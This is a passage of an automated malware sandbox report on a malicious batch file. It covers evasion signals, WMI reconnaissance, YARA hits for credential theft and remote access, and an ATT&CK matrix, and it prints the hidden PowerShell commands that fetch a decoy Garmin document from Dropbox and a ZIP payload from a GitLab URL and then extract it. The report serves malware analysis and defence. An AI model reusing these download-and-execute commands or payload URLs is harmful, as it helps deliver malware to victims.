                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3713Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6141Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4860Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1631Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4484Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5296Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1900Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 548Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6008Thread sleep count: 3713 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5872Thread sleep count: 6141 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6028Thread sleep time: -13835058055282155s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2772Thread sleep count: 4860 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3048Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2772Thread sleep count: 1631 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6004Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7984Thread sleep count: 4484 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7984Thread sleep count: 5296 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7248Thread sleep time: -20291418481080494s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2936Thread sleep count: 1900 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3196Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2972Thread sleep count: 548 > 30Jump to behavior
                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\catroot2Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\System32\AppxSip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405#\Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\System32\WindowsPowerShell\v1.0\pwrshsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SYSTEM32\OpcServices.DLLJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\System32\wshext.dllJump to behavior
                Source: powershell.exe, 0000000E.00000002.2520968851.000001875F8E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlls0
                Source: powershell.exe, 0000000C.00000002.1369267843.000001973A960000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: Yara matchFile source: amsi64_7732.amsi.csv, type: OTHER
                Source: Yara matchFile source: amsi64_7056.amsi.csv, type: OTHER
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7732, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7056, type: MEMORYSTR
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp.com 437Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmpJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe findJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I set "C:\Users\user\Desktop\jhsdgfjkh236.bat"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I goto "C:\Users\user\Desktop\jhsdgfjkh236.bat"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I echo "C:\Users\user\Desktop\jhsdgfjkh236.bat"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I pause "C:\Users\user\Desktop\jhsdgfjkh236.bat"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe findJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmpJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/mfmemsox3eb9769rgrajn/Garmin_Campaign_Information_for_Partners_V11.docx?rlkey=oy421vwzu8dsedagxt4w0ddsw&st=31jc5byu&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V11.docx')"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V11.docx'"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/fgh8090051/jgh/-/raw/main/FGa1812.zip', 'C:\Users\Public\Document.zip')"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -command "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; (new-object -typename system.net.webclient).downloadfile('https://www.dropbox.com/scl/fi/mfmemsox3eb9769rgrajn/garmin_campaign_information_for_partners_v11.docx?rlkey=oy421vwzu8dsedagxt4w0ddsw&st=31jc5byu&dl=1', 'c:\users\user\appdata\local\temp\\garmin_campaign_information_for_partners_v11.docx')"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -command "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; (new-object -typename system.net.webclient).downloadfile('https://gitlab.com/fgh8090051/jgh/-/raw/main/fga1812.zip', 'c:\users\public\document.zip')"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -command "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; (new-object -typename system.net.webclient).downloadfile('https://www.dropbox.com/scl/fi/mfmemsox3eb9769rgrajn/garmin_campaign_information_for_partners_v11.docx?rlkey=oy421vwzu8dsedagxt4w0ddsw&st=31jc5byu&dl=1', 'c:\users\user\appdata\local\temp\\garmin_campaign_information_for_partners_v11.docx')"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -command "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; (new-object -typename system.net.webclient).downloadfile('https://gitlab.com/fgh8090051/jgh/-/raw/main/fga1812.zip', 'c:\users\public\document.zip')"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: amsi64_7056.amsi.csv, type: OTHER
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7056, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: amsi64_7056.amsi.csv, type: OTHER
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7056, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information11
                Scripting
                Valid Accounts2
                Windows Management Instrumentation
                11
                Scripting
                11
                Process Injection
                1
                Masquerading
                OS Credential Dumping111
                Security Software Discovery
                Remote ServicesData from Local System1
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                Command and Scripting Interpreter
                1
                DLL Side-Loading
                1
                DLL Side-Loading
                31
                Virtualization/Sandbox Evasion
                LSASS Memory1
                Process Discovery
                Remote Desktop ProtocolData from Removable Media1
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                PowerShell
                Logon Script (Windows)Logon Script (Windows)11
                Process Injection
                Security Account Manager31
                Virtualization/Sandbox Evasion
                SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                Obfuscated Files or Information
                NTDS1
                Application Window Discovery
                Distributed Component Object ModelInput Capture3
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                DLL Side-Loading
                LSA Secrets2
                File and Directory Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials31
                System Information Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://uce7538052cd98e23dd4ab202b67.dl.dropboxusercontent.com0%Avira URL Cloudsafe
                https://uce7538052cd98e23dd4ab202b67.dl.dropboxusercontent.com0%Avira URL Cloudsafe
                https://uce7538052cd98e23dd4ab202b67.dl.dropboxusercontent.com/cd/0/get/CghgEBbI7BWE-ZfTAruPVm3dHgMT0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                bg.microsoft.map.fastly.net
                199.232.214.172
                truefalse
                  high
                  edge-block-www-env.dropbox-dns.com
                  162.125.69.15
                  truefalse
                    high
                    gitlab.com
                    172.65.251.78
                    truefalse
                      high
                      www-env.dropbox-dns.com
                      162.125.69.18
                      truefalse
                        high
                        www.dropbox.com
                        unknown
                        unknownfalse
                          high
                          uce7538052cd98e23dd4ab202b67.dl.dropboxusercontent.com
                          unknown
                          unknownfalse
                            unknown
                            NameMaliciousAntivirus DetectionReputation
                            https://gitlab.com/fgh8090051/jgh/-/raw/main/FGa1812.zipfalse
                              high
                              https://www.dropbox.com/scl/fi/mfmemsox3eb9769rgrajn/Garmin_Campaign_Information_for_Partners_V11.docx?rlkey=oy421vwzu8dsedagxt4w0ddsw&st=31jc5byu&dl=1false
                                high
                                NameSourceMaliciousAntivirus DetectionReputation
                                http://gitlab.compowershell.exe, 0000000E.00000002.2464009418.0000018748C83000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://www.dropbox.com/service_worker.jspowershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://gitlab.com/-/sandbox/;powershell.exe, 0000000E.00000002.2464009418.0000018748C83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2464009418.0000018748CA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
